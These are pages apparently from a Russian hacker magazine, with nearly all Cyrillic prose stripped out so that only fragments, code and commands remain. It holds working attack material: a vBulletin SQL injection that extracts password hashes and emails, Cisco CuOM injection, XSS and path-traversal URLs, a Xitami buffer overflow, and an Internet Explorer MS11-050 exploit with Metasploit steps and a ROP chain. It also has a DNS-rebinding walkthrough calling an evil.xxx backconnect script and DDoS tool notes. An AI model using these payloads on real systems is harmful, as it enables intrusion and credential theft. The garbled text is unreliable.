"$table AS $table WHERE $key IN (" . implode(', ', $id) . ")";
if ($rst = $vbulletin->db->query_read($sql))
{
while($row = $vbulletin->db->fetch_row($rst))
{
$names[] = $row[0];
}
}

CVSSV2
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
BRIEF
vBulletin x ,
CMS (vBulletin Publishing suite),
. J0hn.X3r
,
, .

, .
,
, . ,
.

if (count($names) > 0)
{
return $table_display . ': ' . implode(', ', $names);
}
}
else
{
//If we got here, we have a single value
if ($row = $vbulletin->db->query_first(
"SELECT $table.$fieldname from " . TABLE_PREFIX .
"$table AS $table WHERE $key = $id"))
{
return $table_display . ' ' .
self::getCompareString($comparator, $is_date)
. ' ' . $row[0];
}
}

EXPLOIT
. /vb/search/
searchtools.php getDisplayString:
public static function getDisplayString($table,
$table_display, $fieldname, $key, $id, $comparator, $is_date)
{
global $vbulletin, $vbphrase;
$names = array();

return "";
if (is_array($id))
{
$sql = "SELECT DISTINCT $table.$fieldname from " .


$id,

SOLUTION
.
,
, $id , :
$id = $vbulletin->db->sql_prepare($id);
if (is_array($id))
{

Cisco ,
. ,
, /packages/vbforum/search/type/
socialgroup.php, 201-203:
vB_Search_Searchtools::getDisplayString(
'socialgroupcategory', $vbphrase['categories'],
'title', 'socialgroupcategoryid',
$value, vB_Search_Core::OP_EQ, true ));

- . ?
,
social groups.
Live HTTP Headers Firefox, POST-.
,
search.php. Search Multiple Content
Types groups,
- ,
, team. POST- :
type%5B%5D=7&query=team&titleonly=1&searchuser=&ex
actname=1&tag=&dosearch=Search+Now&searchdate=0&beforeafter=a
fter&sortby=relevance&order=descending&saveprefs=1&s=&securit
ytoken=1302542927-d4cf038925f1bba6869e060b837d651371f1c0e0&do
=process&searchthreadid=

SQL:
type%5B%5D=7&query=team&titleonly=1&searchuser=&ex
actname=1&tag=&dosearch=Search+Now&searchdate=0&beforeafter=a
fter&sortby=relevance&order=descending&saveprefs=1&s=
&securitytoken=1302542927-d4cf038925f1bba6869e060b837d6513
71f1c0e0&do=process&searchthreadid=&cat[0]=1) UNION SELECT
'haxhax' #

!
haxhax. : , ,
, :
type%5B%5D=7&query=team&titleonly=1&searchuser=&ex
actname=1&tag=&dosearch=Search+Now&searchdate=0&beforeafter=a
fter&sortby=relevance&order=descending&saveprefs=1&s=
&securitytoken=1302542927-d4cf038925f1bba6869e060b837d
651371f1c0e0&do=process&searchthreadid=&cat[0]=1) UNION
SELECT concat_ws(0x3a,username,password,salt,email) FROM
bulletinuser limit 1,1#

, John The Ripper, PasswordsPro -


, .
TARGETS
vBulletin Publishing Suite 4.0.0 4.1.2
vBulletin Forum Classic 4.0.0 4.1.2

. $id
, sql_prepare()
( , , ).
:
function sql_prepare($value)
{
    if (is_string($value))
    {
        return "'" . $this->escape_string($value) . "'";
    }
    else if (is_numeric($value) AND $value + 0 == $value)
    {
        return $value;
    }
    else if (is_bool($value))
    {
        return $value ? 1 : 0;
    }
    else if (is_null($value))
    {
        return "''";
    }
    else if (is_array($value))
    {
        foreach ($value as $key => $item)
        {
            $value[$key] = $this->sql_prepare($item);
        }
        return $value;
    }
    else
    {
        return "'" . $this->escape_string($value) . "'";
    }
}

02


CISCO UNIFIED OPERATIONS MANAGER
8.0 8.5

CVSSV2
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
BRIEF
Cisco Unified Operations Manager (CuOM)
, .
. Sense of Security
: SQL-, ,
-. ,
CVSS
, SQL-,
7,5 10.


vBulletin

0c0c0c0c
EXPLOIT
1. CCMs PRTestCreation.do
SQL-, :
/iptm/PRTestCreation.do?RequestSource=dashboard&MACs=&CCMs=
'waitfor%20delay'0:0:20'--&Extns=&IPs=

ccm
TelePresenceReportAction.do:
/iptm/TelePresenceReportAction.do?ccm='waitfor%20
delay'0:0:20'--

2. XSS
Common Services Device Center,
:
/iptm/advancedfind.do?extn=73fcb</script><script>alert(1)
</script>23fbe43447/iptm/logicalTopo.do?clusterName=
db4c1"%3balert(1)//4031caf63d7

SOS-11006, . Common Services


Framework Help Servlet, XSS:
/cwhp/device.center.do?device=&72a9f"><script>alert(1)</
script>5f5251aaad=1

3. - - CiscoWorks
Homepage,
-, .
,
:
http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..
\boot.ini
http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..
\Program Files\CSCOpx\MDC\Tomcat\webapps\triveni\WEB-INF\
classes\schedule.properties
http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..
\Program Files\CSCOpx\lib\classpath\com\cisco\nm\cmf\
dbservice2\DBServer.properties
http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..
\Program Files\CSCOpx\log\dbpwdChange.log


SOLUTION
CuOM 8.6 . Cisco, , : CSCtn61716, CSCto12704, CSCto12712
CSCto35577.

03

XITAMI WEB SERVER 2.5B4:

CVSSV2
9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
BRIEF
Xitami web/ftp-, 1996
2000 iMatrix,
. . Xitami
,
.
, , -, web/ftp-.
exploit-db.com
Remote Exploits.
.
EXPLOIT
. :
#root@bt:~# cd Desktop/
#root@bt:~# ./Xitami2_5b4.pl
# Enter your target's IP (e.g.: 192.168.0.123)
# > 192.168.178.37
# [*] Sending the evil header at: 192.168.178.37
# [*] OK, exploitation Done!
# [*] Check please for the shell

, ,
. .
# msfpayload windows/exec cmd=calc.exe R | msfencode -e x86/alpha_mixed -t perl
[*] x86/alpha_mixed succeeded with size 461 (iteration=1)


push esp - retn, nop-


(
..., 0x00c8fee8):
00C8FEA4 00A27C57 W|. ASCII 41,"AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
00C8FEA8 004922F4 "I. ASCII "%s %d %d:%d:%d %d"
00C8FEAC 00C8FEE8 . ASCII 41,"AAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

nop-

Xitami2_5b4.pl,
, , , ip .
.
_sscanf:

00C8FEB0 00C8FED8 .
00C8FEB4 00C8FEDC .
00C8FEB8 00C8FEE0 .
00C8FEBC 00C8FEE4 .
00C8FEC0 00C8FED4 .
00C8FEC4 00A0F2A8 .
00C8FEC8 00A184DC ".
00C8FECC 00000001 #...
00C8FED0 00000000 ....
00C8FED4 00000000 ....
00C8FED8 00000000 ....
00C8FEDC 00000000 ....
00C8FEE0 00000000 ....
00C8FEE4 00000000 ....
00C8FEE8 41414141 AAAA
00C8FEEC 41414141 AAAA
00C8FEF0 41414141 AAAA
00C8FEF4 41414141 AAAA

AAAAA... , .
DEP,
. - push esp ret.
.
, , . push esp
ret :
$RET = "\x53\x2b\xab\x71";
# ws2_32.dll push ESP ret (Windows XP SP3 [En]).

:
$RET = "\x53\x2b\xa9\x71";

.text:0042A38D push eax
.text:0042A38E lea edx, [esp+7Ch+var_58]
.text:0042A392 push ecx
.text:0042A393 push edx
.text:0042A394 push offset aDSDDDD ; "%d %s %d %d:%d:%d"
.text:0042A399
.text:0042A399 loc_42A399: ; CODE XREF: sub_42A1F0+10B#j
.text:0042A399 push edi ; Src
.text:0042A39A call _sscanf; <---
.text:0042A39F mov ecx, [esp+8Ch+var_5C]
.text:0042A3A3 add esp, 20h


0x54,0xc3 (push esp retn), ImmDbg
pvefindaddr. pvefindaddr,
!usage pvefindaddr
ImmDbg.
ret,
0x71a92b53. retn, push esp retn, nop-,
.


Developer Tools DOM,


<object> , , ,
, :


TARGETS
Xitami 2.5b4
SOLUTION

04

MS11-050 IE
MSHTML!COBJECTELEMENT USE
AFTER FREE

CVSSV2
9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
BRIEF
Internet Explorer 7-8.
Metasploit.
use-after-free,
, <object>
,
.
Mshtml!CObjectElement,
. , mshtml!CDisplay <object>
,
, , , use-after-free.
EXPLOIT
Metasploit show options.
:
msf > use exploit/windows/browser/ms11_050_mshtml_cobjectelement
msf exploit() > set SRVHOST 192.168.0.63
SRVHOST => 192.168.0.63
msf exploit() > set PAYLOAD windows/exec
PAYLOAD => windows/exec
msf exploit() > set CMD calc.exe
CMD => calc.exe
msf exploit() > exploit
[*] Exploit running as background job.
[*] Using URL: http://192.168.0.63:8080/b6t3wEBKj
[*] Server started.
msf exploit(ms11_050_mshtml_cobjectelement) >

(http://192.168.0.63:8080/b6t3wEBKj) . ( IE ),


<html>
<body>
<script language='javascript'>
document.body.innerHTML += "<object align='right' hspace='1000' width='1000'>TAG_1</object>";
// document.body.innerHTML += "<a id='tag_3' style='bottom:200cm;float:left;padding-left:-1000px; border-width:2000px;text-indent:-1000px' >TAG_3</a>";
document.body.innerHTML += "AAAAAAA";
document.body.innerHTML += "<strong style='font-size:1000pc;margin:auto -1000cm auto auto;' dir='ltr'>TAG_11</strong>";
</script>
</body>
</html>

, ,
, :
0:008> k
ChildEBP RetAddr
020be350 63602718 mshtml!CElement::Doc+0x2
020be36c 636026a3 mshtml!CTreeNode::ComputeFormats+0xb9
020be618 63612a85 mshtml!CTreeNode::ComputeFormatsHelper+0x44
020be628 63612a45 mshtml!CTreeNode::GetFancyFormatIndexHelper+0x11
020be638 63612a2c mshtml!CTreeNode::GetFancyFormatHelper+0xf
020be64c 637d29ab mshtml!CTreeNode::GetFancyFormat+0x35
020be654 637d2906 mshtml!CLineCore::AO_GetFancyFormat+0x23
020be688 63675c93 mshtml!CRecalcLinePtr::RecalcMargins+0x19d
020bee80 6369985f mshtml!CDisplay::RecalcLines+0x6e4
020bef5c 6361c037 mshtml!CDisplay::WaitForRecalc+0x208
020befac 636514de mshtml!CFlowLayout::Notify+0x7d7
020befb8 636017f2 mshtml!NotifyElement+0x41
020bf00c 6365134f mshtml!CMarkup::SendNotification+0x60
020bf034 63666bc1 mshtml!CMarkup::Notify+0xd4
020bf07c 6361bf07 mshtml!CElement::SendNotification+0x4a
020bf0a0 635d82b7 mshtml!CElement::EnsureRecalcNotify+0x15f
020bf11c 635cc225 mshtml!CDisplayPointer::MoveUnit+0x2b2
020bf208 635cc092 mshtml!CHTMLEditor::AdjustPointer+0x16f
020bf23c 635cd2af mshtml!CEditTracker::AdjustPointerForInsert+0x8b
020bf298 635cd123 mshtml!CCaretTracker::PositionCaretAt+0x141

, , ,
<object>
, . object
, , .
.
, IE
, use-after-free.
, <object>, , , ,
,
object .
IE7 IE8 DEP
CObjectElement 0c0c0c0c:
mshtml!CElement::Doc:
3cf76b80 8b01     mov eax,dword ptr [ecx]
                  ; ds:0023:147f00a7=0c0c0c0c
3cf76b82 8b5070   mov edx,dword ptr [eax+70h]
                  ; ds:0023:0c0c0c7c=0c0c0c0c
3cf76b85 ffd2     call edx
                  ; {<Unloaded_sspc.dll>+0xc0c0c0b (0c0c0c0c)}
                  ; <-- ( nops + shellcode)
3cf76b87 8b400c   mov eax,dword ptr [eax+0Ch]
3cf76b8a c3       ret

IE8 DEP
ROP-:
1. CObjectElement 0c0c0c0c;
2. heap-spray, ROP-
0c0c0c0c;
3. 0x23000000 nops+shellcode.
, ROP-
:
0c0c0c0c 7c809af1 ; 1:kernel32!VirtualAlloc ( )
0c0c0c10 7c901db3 ; 2:ntdll!memcpy ( )
0c0c0c14 7f000000 ; 1:VirtualAlloc:lpAddress
0c0c0c18 00004000 ; 1:VirtualAlloc:dwSize
0c0c0c1c 00003000 ; 1:VirtualAlloc:flAllocationType MEM_COMMIT | MEM_RESERVE
0c0c0c20 00000040 ; 1:VirtualAlloc:flProtect rwx
0c0c0c24 7f001000 ; 3:nops+shellcode ( )
0c0c0c28 7f001000 ; 2:memcpy:dst
0c0c0c2c 23000100 ; 2:memcpy:src
0c0c0c30 00002fff ; 2:memcpy:size
0c0c0c34 be9e2688 ;
...
0c0c0c74 de2f62e1 ;
0c0c0c78 a19314eb ;
0c0c0c7c 773e3f18 ; comctl32!CImageList::_IsSameObject+0x40
;
0c0c0c80 3825a2d7 ;
0c0c0c84 88f8a84d ;
0c0c0c88 0566b421 ;

mshtml!CElement::Doc :
mshtml!CElement::Doc:
3cf76b80 8b01     mov eax,dword ptr [ecx]
                  ; ds:0023:35a00002=0c0c0c0c
3cf76b82 8b5070   mov edx,dword ptr [eax+70h]
                  ; ds:0023:0c0c0c7c=773e3f18
3cf76b85 ffd2     call edx ;
                  ; {comctl32!CImageList::_IsSameObject+0x40 (773e3f18)}

ROP-
, esp eax (0c0c0c0c):
0:007> u comctl32!CImageList::_IsSameObject+40 L?2
comctl32!CImageList::_IsSameObject+0x40:
773e3f18 94       xchg eax,esp ; esp == 0c0c0c0c
773e3f19 c3       ret ; kernel32!VirtualAlloc

ROP- :
0c0c0c10 7c901db3 ; 2:ntdll!memcpy ( )
0c0c0c14 7f000000 ; 1:VirtualAlloc:lpAddress
0c0c0c18 00004000 ; 1:VirtualAlloc:dwSize
0c0c0c1c 00003000 ; 1:VirtualAlloc:flAllocationType MEM_COMMIT | MEM_RESERVE
0c0c0c20 00000040 ; 1:VirtualAlloc:flProtect rwx
0c0c0c24 7f001000 ; 3:nops+shellcode ( )
0c0c0c28 7f001000 ; 2:memcpy:dst
0c0c0c2c 23000100 ; 2:memcpy:src
0c0c0c30 00002fff ; 2:memcpy:size

kernel32!VirtualAlloc 0x4000
// 0x7f000000, ntdll!memcpy.
:
0c0c0c24 7f001000 ; 3:nops+shellcode ( )
0c0c0c28 7f001000 ; 2:memcpy:dst
0c0c0c2c 23000100 ; 2:memcpy:src
0c0c0c30 00002fff ; 2:memcpy:size

ntdll!memcpy 0x2fff 0x23000100 (


nops + shellcode)
0x7f001000 (rwx-, VirtualAlloc)
nops + shellcode,
0x7f001000:
ntdll!memcpy:
7c901db3 55       push ebp
7c901db4 8bec     mov ebp,esp
7c901db6 57       push edi
7c901db7 56       push esi
7c901db8 8b750c   mov esi,dword ptr [ebp+0Ch]
                  ; ss:0023:0c0c0c2c=23000100
7c901dbb 8b4d10   mov ecx,dword ptr [ebp+10h]
                  ; ss:0023:0c0c0c30=00002fff
7c901dbe 8b7d08   mov edi,dword ptr [ebp+8]
                  ; ss:0023:0c0c0c28=7f001000
...
7c901de6 f3a5     rep movs dword ptr es:[edi],dword ptr [esi]
                  ; nops+shellcode 0x7f001000
...
7c901f4d c9       leave
7c901f4e c3       ret
                  ; 7f001000 (
                  ; nops + shellcode)

TARGETS
Internet Explorer 7-8
SOLUTION
. z



, Digital Security (twitter.com/asintsov)
, ESET (twitter.com/matrosov)

CONFIDENCE 2011

CONFidence
. ,
,
.
,
.
:

CONFidence 20-
. IT-security ,
-
( Black Hat, HITB, HashDays, SOURCE, BruCon, DeepSEC).
,
, , ,
, .
, ESET
.
, CONFidence
. , ,
.


, :
, , , ,
:).
, 1901 ,

.
, . , :
, (, ),
( ,
). ,

ESET TDL4
, ,
, , .
- , :
...
,
- :). ,
CrackMe ReverseMe Tipping Point
IPS. , ESET

. , ,
.
(2011.confidence.org.pl/misc/CrackMe/force64.ex_). ,
,

, .
, CONFidence 2011 ,

. ,
, .


Your Network Security Starts at Layer Zero
: ,
, -, . --
. , ,
, ,
. , , .
, ,
? ,

,
? ,
. ,
,
,
( , , ), - ,

, .
, ,
.
, ,
, , :).
, , Ekoparty, . (deviating.net/lockpicking/equipment.html) , , ,
,
. ( ) ,
!
:
,
. Renderman, , Defcon.
(, , ),
.

DVD
dvd

CONFidence 2011

DVD.

: SVG
The forbidden image Security impact of Scalable
Vector Graphics on the WWW
:


Digital Security

SVG. ( PHP-IDS
) SVG, ,
XSS, .
, , ,
(, , , IDS
WAF).

: Angry Birds
Hacking a Bird in the Sky: The Revenge of Angry Birds
: , Nobody
, ,
. , . ,
, : ,
(, ,
, WinNT 4.0 ), IP- (
, - , ,
, ). ,
,
,
: TDMA . ,
( ,
, ) .
, ,
:). , IT-security ,
!
, .
:
, (
, , ).

Low Fragmentation
Heap
Modern Heap Exploitation using the Low Fragmentation Heap
:
( , , , PHD CTF ,


) . :).
Microsoft
. - , , , ,
Windows. IIS FTP,
, , (
EIP) .
LFH (Low Fragmentation Heap). , MS. ,
, FTP-,
LFH,
.
FreeEntryOffset, , , EIP.
, 5% , - .

x64: TDL
Defeating x64: The Evolution of the TDL Rootkit
: ,
TDL x64
(, PatchGuard),
MBR ,
!
, , TDL4, ,
. .
- TDL .

DNS
DNS for evil
:
DNS for evil, DNS-
C&C. ,
][.

Microsoft Windows
Escaping From Microsoft Windows Sandboxes
:

Lockpicking - .
Verizone,
.
(, , ,
, ..), ,
, .
. , ,
, , , DEP ASLR. , ,
( ,
)
. .
. Google Chrome,

, Acrobat Reader, Flash,
Protection Mode IE8 :).
, ][
? ,
!

MC13224
Practical attacks on the Freescale MC13224 ZigBee SoP
:
, !
,
! .
MC13224,
,
.. (, Defcon 18). MC13224
32- ARM7, , 802.15.4 . ,

CONFidence?

,
.
( ),
. ,
( )
. ,
,


: ,
? !
, JTAG- ?
. ,
... ! ...
. , bit.ly/kE5jHV. ,
, .
. ,
:).
: ...

Outro

, ,
, , BeeF.
( ) 2011.confidence.org.pl/materials ( . ). ,
,
.
CONFidence, .
,
. . ,
. , , PHD
, ,
: ,
( Chaos Constructions
). . Defcon ( -),
,

. ! z

- .
. ,
, ,
.
,
. ,
. ,
CONFidence.
,
, , -
.


CTF

19
Positive Hack Days,
Positive Technologies,
CTF. 10 , ,
8
.

, ,
. , . .
,
.
, ,
.
. Positive Hack Days TF
, , .
,
CTF HackQuest. whitebox ( )
blackbox- ( ).
.
, , , -



.
, -, , ..,
CTF
,
.

,
,
,
.
.
,
, .
, , .

,
. , ,
, , , .
, ,
.

.

, CTF, .
,

SCADA (, ).
, , ,

.
,
, .
PHD (Parallelepiped Habile
Deflective).
,

. ,
, , PHD

,

.
. ,

.
,
. ,
...


-
() Plaid Parliament of
Pwning (PPP) 5
.
Leet More - , (
3 ).
HackerDom
, 2
.
CTF ,

:
CTF, .
PHDAYS CTF 2012
, .

.
,
, PPP
.
PPP ,
.
,

.

CTF.
CTF,
PHD CTF
,
. ,
.
PPP
,
PHDays,
.
CTF :
,
, CTF. ,
, -, , ,
.
.
,
,

.


,
Positive Technologies
- PHD
-.
?
,
.
,
-
.
, -
,
, ,
. ,
,
, , ,
, .
RusCrypto CTF.
Positive Hack Days
, ,
InfosecurityMoscow, Chaos Constructions, .
- PHD , 4 ?
Positive Hack Days. ,
,
, . ,
, .
, , , 4


.
,
. 70%,
. 30% , , . , ,
, , , , .
-
?
Positive Hack Days ,
, .
, .
PHD, ,
, , ,
, , . ,
, . , . , CTF
! CTF, PHD, CTF ,
, .
- ?
! ,
, , , ,
, .
, ,
.
- ?
CTF ,
. - , ,
. , ,
.

- Defcon?

BlackHat Defcon,
,
. ,
.


, Cisco
,
-
. .

-
PHD, -
-?
PHD, , .

.
,
, ,
, . , ,
, , ,
- . . , .

- , ?
Positive Hack
Days! , . PHD ,
, , - .
( , ,
, ,
). ,
,
,
. ,
,
.
PHD, .

- Positive Hack Days .


, , ?
PHD.
, .
.
,
, PHD . ,

- PHD

. ?

Positive Hack Days 4 . , ,

. CTF Enterprise-,


, . ,
, ,
,

R&D
. ,
, ,
,
. ,
Research & Development ,

,
.
,
, .
- PHD?
,
, Positive Hack
Days . ,
ositive
Technologies,
- , ,
.
, , ,
,
, -
, . z


DNS REBINDING

Same origin policy


,
, Same origin policy.
,
, .
POST-
javascript css.
, .

, , .
,
( CSRF-),
, . , , CSRF-,
. ,
( ),
.
,
. - Outlook Web Access.
Same origin policy Anti DNS pinning, DNS
rebinding. Anti DNS pinning -,
HTTP-
Host. , web- Apache
IIS .


, HTTP, web. , , API


SOAP, XML-RPC .

, -
, DNS-.
IP-. ,
. ( ) :
1) , .
2) DNS- IP-,
.
3) web- ( IP)
javascript.
4) Javascript
.
5)

Outlook Web Access



.
6) IP- (
DNS-) IP- .
,
evil.xxx, ,
IP- ,
IP- . , ,
- .
, .

, ,
WEB- DNS-,
, .
NS-
.
NS- , IP- . IP- , Javascript, , , IP-
.
, ,
(
), .
Bind 9.
IP- ,
--enable-fixed-rrset. , , ,
. bind9 , IP-.
named.conf.options, options :
rrset-order { order fixed; };
. dns.evil.xxx:
dns    A    97.246.251.93
       A    192.168.0.1
, DNS- , dns.attacker.ru
IP- 97.246.251.93, , , 192.168.0.1.
,
.

DNS ( Apache), .
iptables,
tcp-reset ,
TCP- . iptables
:
iptables -A INPUT -s [ IP-] -p tcp \
--dport 80 -j REJECT --reject-with tcp-reset

80- ,
, . :
1) dns.evil.xxx.
2) DNS- IP- .
3) ,
IP 97.246.251.93.
4) HTML- JavaScript.
5) , javascript
dns.evil.xxx.
6)
IP- .
7)
dns.attacker.ru , 97.246.251.93 RST, 192.168.0.1.
javascript GET/POST/HEAD-
, 97.246.251.93,
!

, , , .
? -, ,
,
- , .
,
. , /, .
,


DNS Rebinding
OWA
- online.
,
,
. , Same Origin Policy
, ,
AJAX-,
XMLHttpRequest.
,
(
) ,
(80- ).
, Same
Origin Policy. , JSONP,
, ( JSONP , web). , .

XMLHttpRequest ,
, .
.
,
setInterval,
,
, . .

, , . , .
IP- . -,

. -,

, . -,
IP-
(
).


IP- . , , IFRAME
onLoad.
Image onLoad , . ,
, setTimeout,
, , ,
.

:
1) -
IP-, onLoad
.
2)
.
3) /
.

.

CSS History Hack v 2.0

-, .
, javascript
, , .
, ,
javascript <a>
. ,
CSS.
, .
( IE8) ,
. ,
-. , :
var links = [
'http://192.168.0.1',
'http://192.168.1.1',
'http://10.1.1.1'
];

STYLE
CSS- :
A#id:visited { background:url('http://admin.evil.xxx:8080/backonnect.php?url=http://192.168.0.1'); }

basic-

Cisco

, , ,
url, , url .
,
, .

2)
.
3) DNS- ,
IP-. :

DNS rebinding ,

TCP handshake. ,
. , IE Firefox
200 OK , Opera
404 IP-.
, .
,
HTML-. , IP-
,
DNS.
, ip- 192.168.0.1
192.168.0.1.dns.evil.xxx. http://dns.evil.xxx/control.html iframe,
, DNS Rebinding, , ,
http://192.168.0.1.dns.evil.xxx/rebinding.html.
,
- ,
.
: , , :).
,
, ip- , . .
:
1) ip- (, 97.246.251.93).

iptables

97.246.251.93.dns.evil.xxx    A    97.246.251.93
                              A    192.168.0.1

4)
src- IFRAME.
5) , 192.168.0.1.evil.xxx .
6)
, 80- .
7)
.
8) ,
.
9)
, 80- .
10) ,
.
DNS-
DNS, ,
nsupdate. DNS-
.

DNS
Rebinding

,
, :
1) . -
VirtualHost _default_, *:80 .
2) -.
, ,
, Host HTTP ,
.
3) NOSCRIPT ,
JavaScript, Java-
Flash-.
4) , , ,
, .
, API,
. , API
Amazon EC2, VMware ESX. z



(twitter.com/ABazhanyuk, CISS Research Team)
(twitter.com/NTarakanov, CISS Research Team)

0DAY


. , :
PHD
. Safari (
0day Windows),
.

, ?
:
Windows Internet Explorer (6/7/8)
Mozilla Firefox (3*/4*)
Google Chrome
Safari
Opera
Opera Mini
Netscape Navigator
Midori
Skyfire
Dolphin
Konqueror
Dooble
OpenSource-:
Chrome, Firefox Konqueror.
(engine-). :
Amaya
Gecko
HTMLayout
KHTML
Presto
Prince


Trident
WebKit
, Chrome Safari OpenSource- WebKit,
Firefox Gecko. JavaScript
, , , Google
V8 ( Rhino SpiderMonkey). , flash, jre (
) .

, .

, cross_fuzz . Google
-, .
(bit.ly/lbgfqm)
Internet Explorer, Firefox, Opera,
WebKit. ( ,
) !
cross_fuzz .

DOM-, . ,

INFO

info


,
Selenium
(seleniumhq.org).

,


.

IE8


Safari

HTTP://WWW

. Safari
User mode write access violations that are not near
NULL are exploitable, eip.

links
JS
(DOM) :
www.webdevout.net/browser-supportecmascript.

and dword ptr ds:0BBADBEEFh, 0
xor eax, eax
call eax

:
heideri.ch/jso.

- , ,
Webkit CRASH(). - ,
. CRASH
, -
- ,
.

,
-
. ,
.
,
:). cross_fuzz HTML/
JavaScript (lcamtuf.coredump.cx/cross_fuzz),
HTML-
( )
. ,
.
( /targets
mersenne.js/logo.jpg).
popup .

:
Firefox 3.6.16;
Firefox 4.0.1;
Chrome 10;
Internet Explorer 8/9;
Safari 5.0.5.


,
,
..:
www.quirksmode.org.


HTML-
.
, cross_fuzz Safari,
5 .
Firefox 3.6.16 15-30
.
DEP.
use-after-free, .
,
3-5 . Chrome . IE
, , .
:
,
, . ,
,
? ,
, .
Cross_fuzz DOM,
.

,
Sandbox
Chrome: dev.chromium.org/developers/design-documents/sandbox.


cross_fuzz HTML/JavaScript


DOM. , .
,
. , , .
cross_fuzz return LOG(message).
, ,
cross_fuzz .
, cross_fuzz .
, , Firebug
Firefox. - JS
:
try {
    console.log('eval %s',name);
    ret_value = eval('target.' + name + '(' + par_str + ')');
} catch (e) {

Firebug,
( ). ( , )
C:\Documents and Settings\username\Application Data\Mozilla\Firefox\Profiles\XXXXXX.default\js. , :
Chrome: Firebug Lite for Google Chrome (
Chrome);
Opera: Opera Dragonfly;
Safari: WebKitDeveloperExtras.
, cross_fuzz, ,
, .

( , ) .
, .
,
. , . ,
, DEP/
ASLR (


][ , , ).
.
,
. ()
, ,
.
, .
,
. , ,
:
Internet Explorer (mzl.la/mC8XP5);
Firefox (bit.ly/jiHbQA).
Safari (bit.ly/jiHbQA) , (Webkit.dll, JavaScriptCore.dll)
. ,
, WebKit .
svn.webkit.org/repository/webkit,
trac.webkit.org/wiki/BuildingOnWindows.
Chrome.
, .
--single-process:
.
Safari, 0day,
.

?
Firefox :
, ,
. (heap).
Firefox, :
.
Chrome:
, ,
Firefox .
Safari:
, . :).
. ,
. : . : SVG,
. , ,
. ,
100%
, . , , , , Safari Positive Hack Days. z

QWERTY, 12345, GFHJKM


Anonymous Lulzsec
. , torrent' Sony Pictures,
40 .
(www.troyhunt.com) .



, . 93% 6 10 (,
), 50% 8 . ,
.

45%

4%
1%
, .
,
,
, .

2,000

50%

4,000

6,000

8,000

10,000

8%
36%

64%

,
?
1,7 (dazzlepod.com/site_media/txt/passwords.txt) , .
,
!

18%

92%

: ?. Sony Pictures ,

. ,
92% .

82%

Sony Pictures (
!), , 82% (projectrainbowcrack.com).
9 .


TDL4

- TDL4

C PHD2011 ,
Olmarik (TDL4). PHD
,
.
, ,
. x64- ,
,
.

64- MS Windows (Vista,


Win7) , ,
, .
. , - Win64/TrojanDownloader.Necurs,
, ( ) (Bcdedit.exe
-set TESTSIGNING ON) Boot Configuration Data (BCD)
TESTSIGNING.
. Win64/Spy.Banker,
TDL4

.
TDL4
, MBR (Master
Boot Record),
ZwRaiseHardError(), BSOD .
(. . 1).
, MBR,
MBR . (. . 2).
,
,


(ROR)
. ldr16,
.
ldr16 BCD
, .
(. . 3).
ldr16
BcdOSLoaderBoolean_WinPEMode (0x26000022),
preinstallation mode, . kdcom.dll,
WinDbg.
kdcom.dll
ldr32 ldr64, , /MININT,
M/
NI, .
:
kdcom.dll? , ,
KdDebuggerInitialize1(),
kdcom.dll, . ,
PsSetLoadImageNotifyRoutine(), .

IoCreateDriver(), -.

.
, (. . 4).
, MS ,
KB2506014,
WinPEMode
kdcom.dll. ,

[1]

[2]

[3] Boot Configuration Data


Win32/Olmarik.AMN,
:).

,
.

.
.
,

TdlFsReader (eset.ru/tools/TdlFsReader.exe).

, TDL3. , :

;

;
;
.
TdlFsReader
.
,
,
,

[4]

[5] TdlFsReader
. , TDL4,
,
.
,
TDL
. , ,
. z



, Positive Technologies

CLOUD
HACKING




. cloud computing

.
IaaS

:
SaaS (Software as a Service)
PaaS (Platform as a Service)
IaaS (Infrastructure as a Service)
HaaS (Hardware as a Service)
WaaS (Workplace as a Service)
IaaS (Infrastructure as a Service)
EaaS (Everything as a Service)
DaaS (Data as a Service)
SaaS (Security as a Service)
IaaS, . IaaS

.

. IaaS ?


:
IPS ;
;
;
;
.
,
,
.
? .



. , ,
,
.
, ,
- .
, -,

. , ,
IP-,
. ,
.

,
.
, ,
. :
IP-, ,
,
.

IaaS , IPS/IDS.

EC2:
20

IPS/IDS
, IP-
, . IPS/IDS , ,
IP- , .
, ,
,
.

IaaS-
. , ,
client-side-. -,
, ,
metasploit canvas. -,
,
, IP-
. , IaaS ,
, IaaS,
.



.


.
ntlm (mixalpha-numeric-all-space, 8 ) .

ssh
1290 . ,
,
1,5
$320k. , ,
, 1,5
. 1
.
20 : 2 x
Intel Xeon X5570 quad-core Nehalem architecture, 2 NVidia
Tesla M2050, 23 .
,
NTLM- 8
. .
8
. ,


(www.ptsecurity.ru/download/PT-Metrics-Passwords-2009.pdf),
, -

Instance        20        $6590 + $0,56/hour
Data Storage    418 Tb    $ 102 / Tb

:
20 * $6590 = $131 800
$ 0,56 * 20 * 12834 = $ 143 740
$ 102 * 418 = $ 42 636
$ 318 176


( 1 12 )                         $ 103
(low-case) ( 1 12 )      21      $ 2 363 252
( 1 11 )                 275     $ 754 064
(low-case) ( 1 10 )      11      $ 9 823
(low-case) ( 1 12 )      1046    $ 80 919 507
(low-case) ( 1 11 )      27      $ 4 631 216
(low-case) ( 1 10 )      297     $ 188 884
(low-case) ( 1 9 )       11      $ 9 695

Instance ()        $0,085 ~ 3
(in+out) ()        $0,150 ~ 5

3

.
2 .
,
, (lowcase) ( 1 12 )
80 . ,
. , 20 000
20, .
DDoS
- /. -:
;
.
IaaS DDoS- ,
-. IaaS
.

.

. :
(Linux/Windows);
;
(<->).
:
SYN flood
UDP flood

ICMP flood
Application flood
HTTP/HTTPS (GET/POST)
FTP
SMTP/SMTP+SSL/TLS
POP3/POP3+SSL
,
.
,

.
:
Mauszahn (www.perihel.at/sec/mz/)
( , ). VoIP
,
,
.
SlowPost.pl ( SlowLoris HTTP DoS Tool)
, HTTP
POST- -, (
).
SlowLoris HTTP DoS (ha.ckers.org/blog/20090617/slowloris-http-dos/). Application Flood
HTTP POST-

